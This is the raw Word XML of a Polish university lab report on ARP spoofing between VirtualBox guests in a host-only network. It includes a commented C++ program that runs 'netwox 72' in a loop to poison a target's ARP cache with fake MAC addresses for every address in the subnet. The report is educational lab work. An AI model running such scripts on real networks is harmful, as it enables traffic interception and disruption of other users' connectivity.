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200" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="laboratorium-nr-9."/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t>LABORATORIUM NR 9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="podstawowe-ataki-na-protok%C3%B3%C5%82-i"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>PODSTAWOWE ATAKI NA PROTOKÓŁ ICMP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="zadanie-9.1.-okre%C5%9Blenie-tryb%C3%B3w"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr/>
        <w:t>Zadanie 9.1. Określenie trybów sieciowych Virtualbox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>9P1: Należy wybrać odpowiedni tryb sieciowy Virtualbox dla struktury sieciowej, niezbędnej do wykonania ćwiczenia. Wybór ten należy uzasadnić. W sprawozdaniu proszę umieścić rysunek przedstawiający opracowaną konfigurację z zaznaczonymi adresami dla interfejsów i ustawionymi trybami sieciowymi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Należy wybrać tryb host-only. Atak typu ARP spoofing może być przeprowadzony tylko w obrębie jednego segmentu sieci. Dzieje się tak dlatego, że ARP cache jest przesyłane tylko pomiędzy węzłami jednej sieci, nigdy nie jest routowane do innych sieci (operuje w warstwie link-layer). Potrzebna będzie nam więc sieć złożona z hosta i dwóch gości (będących w tym samym segmencie sieci), w której będziemy mogli osiągnąć połączenie zarówno pomiędzy gośćmi, jak i z hostem. Przykładowo atak w sieci NAT mógłby nie zakończyć się powodzeniem, ponieważ maszyny wirtualne znajdowałyby się w innych segmentach sieci, a więc przesył ARP cache nie byłby między nimi możliwy, co uniemożliwiłoby atak typu ARP spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Szkic przedstawiający utworzoną konfigurację:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FigurewithCaption"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114935" distR="114935">
            <wp:extent cx="4699000" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture" descr="konfigurac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konfiguracja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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>instrukcja dla konfiguracji:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>https://condor.depaul.edu/glancast/443class/docs/vbox_host-only_setup.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Zadanie 9.2. Modyfikacja ARP cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>9P2: Proszę „zatruć” pamięć podręczną ARP na maszynie vhost2 poprzez wygenerowanie odpowiedniego komunikatu za pomocą narzędzia 72 i wysłanie go z maszyny wirtualnej vhost1. W sprawozdaniu proszę przedstawić przyjęte ustawienia narzędzia 72 z pakietu Netwax/Netwag oraz dowód, że zawartość pamięci podręcznej ARP na maszynie vhost 2 zmieniła się zgodnie z oczekiwaniami.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ustawienia narzędzia 72 z pakietu Netwag na vhost1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114935" distR="114935">
            <wp:extent cx="5334000" cy="3673475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FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Wynik “zatrucia” pamięci ARP na vhost2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114935" distR="114935">
            <wp:extent cx="5334000" cy="930275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Jak widzimy na powyższym zrzucie ekranu - do pamięci ARP vhost2 (atakowanego) został dodany wpis kojarzący podany na vhost1 (atakujący) adres IP z podanym adresem MAC. Spowoduje to, że vhost2 chcąc połączyć się z podanym adresem (adresem bramy domyślnej), będzie przesyłać pakiety na nieprawidłowy (podany przez atakującego) adres fizyczny. Może to umożliwiać atakującemu przechwytywanie danych przeznaczonych dla innych hostów (jeśli poda swój adres fizyczny).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>9P3: Proszę na podstawie przedstawionego wyżej, przykładowego kodu, napisać i uruchomić na vhost 1 program, który „zatruje” ARP cache na vhost2 poprzez umieszczenie w niej powiązań wszystkich możliwych adresów IP wykorzystywanych w domenie rozgłoszeniowej z dowolnymi, fikcyjnymi adresami MAC. W sprawozdaniu proszę umieścić opracowany kod programu z komentarzami co wykonywane jest w poszczególnych liniach kodu oraz dowód, że atak przeprowadzony w oparciu o ten program, zakończył się sukcesem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Kod programu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>&lt;stdlib.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/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&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> std;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> main()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ethadd[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arppoison[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr/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i=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>; i&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>; i++)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>//pętla przebiega 254 razy - dla każdego możliwego adresu</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>//IP, oprócz adresu rozgłoszeniowego (.255) i adresu sieci (.0)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        sprintf(add,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.56.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>,i);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CommentTok"/>
        </w:rPr>
        <w:t>//przechowywanie w pamięci (tablica add)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//kolejnych możliwych adresów wykorzystywanych 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CommentTok"/>
        </w:rPr>
        <w:t>//w domenie rozgłoszeniowej</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        sprintf(ethadd,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>,i,i,i,i,i,i);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//przechowywanie w pamięci (tablica ethadd) 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CommentTok"/>
        </w:rPr>
        <w:t>//kolejnych fikcyjnych adresów MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        sprintf(arppoison,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"netwox 72 --ips </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>192.168.56.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        --device \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"Eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --src-eth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --src-ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>,ethadd,add);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//utworzenie polecenia używającego narzędzia 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//nr 72 pakietu netwox, odnośnie adresu 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//vhost2 (192.168.56.3), interfejsu eth0, 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//tworzącego powaiązanie fikcyjnego adresu MAC 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//(pobranego z tablicy ethadd) z danym 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CommentTok"/>
        </w:rPr>
        <w:t>//adresem IP (pobranym z tablicy add)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        system(arppoison);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CommentTok"/>
        </w:rPr>
        <w:t>//wykonanie polecenia</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr/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rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Wynik wykonania skryptu na vhost1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114935" distR="114935">
            <wp:extent cx="5334000" cy="1470660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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FirstParagraph"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Wynik działania skryptu na vhost2 (polecenie arp -nv):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114935" distR="114935">
            <wp:extent cx="5334000" cy="2479040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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FirstParagraph"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Na podstawie pamięci ARP vhost2 widzimy, że atak zakończył się sukcesem - do tablicy dodano powiązania wszystkich adresów IP (oprócz rozgłoszeniowego i sieci) w sieci 192.168.56.0 z wygenerowanymi kolejno adresami MAC.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character" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1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FigurewithCaption" w:customStyle="1">
    <w:name w:val="Figure with Caption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condor.depaul.edu/glancast/443class/docs/vbox_host-only_setup.html" TargetMode="Externa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LibreOffice/6.0.7.3$Linux_X86_64 LibreOffice_project/00m0$Build-3</Application>
  <Pages>4</Pages>
  <Words>527</Words>
  <Characters>3480</Characters>
  <CharactersWithSpaces>4196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2020-01-26T22:06:41Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-26T23:07:42Z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